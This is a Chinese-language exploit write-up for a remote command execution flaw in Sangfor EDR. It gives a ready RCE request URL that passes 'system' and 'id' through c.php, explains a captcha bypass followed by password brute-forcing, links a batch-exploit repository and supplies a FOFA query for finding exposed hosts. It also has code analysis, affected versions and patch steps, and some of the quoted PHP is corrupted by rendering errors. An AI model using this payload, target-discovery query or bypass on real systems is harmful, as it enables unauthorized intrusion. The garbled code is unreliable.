深信服EDR远程命令执行

0x00简介
深信服EDR属于终端安全产品部，是深信服公司在安全业务的战略级投入产品。终端安全部门负责下一代终端安全解决方案的产品研发，基于先进的AI技术和高效的安全领域经验， 建设深信服整体安全解决方案的端点响应能力，与云、网、端产品联动，构建面向未来、有效防御的闭环体系。

0x01利用方法
1.https://xxx.xxx.xx.xx/tool/log/c.php?strip_slashes=system&host=id

2.linux读取文件

3.验证码绕过
// 校验验证码

if (!ldb_run_at_console()) {
if (isset($_REQUEST[“captcha”])
|| $_REQUEST[“captcha”] != base64_decode("M…
echo “验证码不对，请输入…”
return;
}
}

先输入几次错误密码，把验证码弄出来后，开启Burp（抓包工具）爆破密码即可，只要验证码第一次输入对后不为空，即可绕过。

4. 批量利用方法
   在GitHub上已经有大佬放出批量攻击的exp

https://github.com/A2gel/sangfor-edr-exploit

请勿尝试，非法攻击是违法的，请误去触犯法律，如作他用所承受的法律责任一概与作者无关

0x02搜索相关漏洞方法
Fofa地址：https://fofa.so/

使用fofa搜索引擎搜索：body=“终端检测响应平台”

0x03漏洞分析
1.RCE漏洞

echo “

Log Helper

”;
$show_form($_REQUEST);

跟入show_form

/*
* 显示表单
* @param array $params 请求参数
* @return
*/

$show_form = function(KaTeX parse error: Expected 'EOF', got '&' at position 13: params) use(&̲strip_slashes, &KaTeX parse error: Expected '}', got 'EOF' at end of input: …put) { extract(params);
$host = isset($host)?$strip_slashes($host):“127.0.0.1”;

经典的php变量覆盖漏洞，使用grep搜索一下

tools目录下全部都是变量覆盖漏洞，单纯只防御网上那个poc是没有用的。

2.任意文件下载漏洞

可以看到代码没有任何的过虑

3.验证码绕过

0x03影响范围

受此漏洞影响的版本仅包括EDR

v3.2.16

v3.2.17

v3.2.19

0x04修复方式

目前，深信服已经发布升级版本和补丁，更新至v3.2.21版本或升级补丁即可修复该问题并增强其他安全机制。

1.深信服已通过在线升级方式推送补丁包修复该漏洞，开启在线升级功能可自动修复该漏洞。

2.针对无法在线升级的用户，深信服技术服务人员将主动协助用户完成EDR版本升级或补丁修复工作。同时，用户可通过以下链接下载升级安装包来完成EDR的升级工作：

https://bbs.sangfor.com.cn/plugin.php?id=service:download&action=view&fid=100000022878128#/100000035115623/all/undefined

下载升级安装包后打开EDR管理平台，在系统管理–升级管理–平台和终端升级界面中导入该升级安装包，导入后管理平台和终端将自动升级至v3.2.21版本。

参考文章：
https://www.cnblogs.com/potatsoSec/p/13520546.html
https://mp.weixin.qq.com/s/nAEqjeCm34t1yD5Kh7ZJxA

​

免责申明：
本项目仅进行信息搜集，漏洞探测工作，无漏洞利用、攻击性行为，发文初衷为仅为方便安全人员对授权项目完成测试工作和学习交流使用。 请使用者遵守当地相关法律，勿用于非授权测试，勿用于非授权测试，勿用于非授权测试~~（重要的事情说三遍）~~，如作他用所承受的法律责任一概与东塔安全学院无关！！！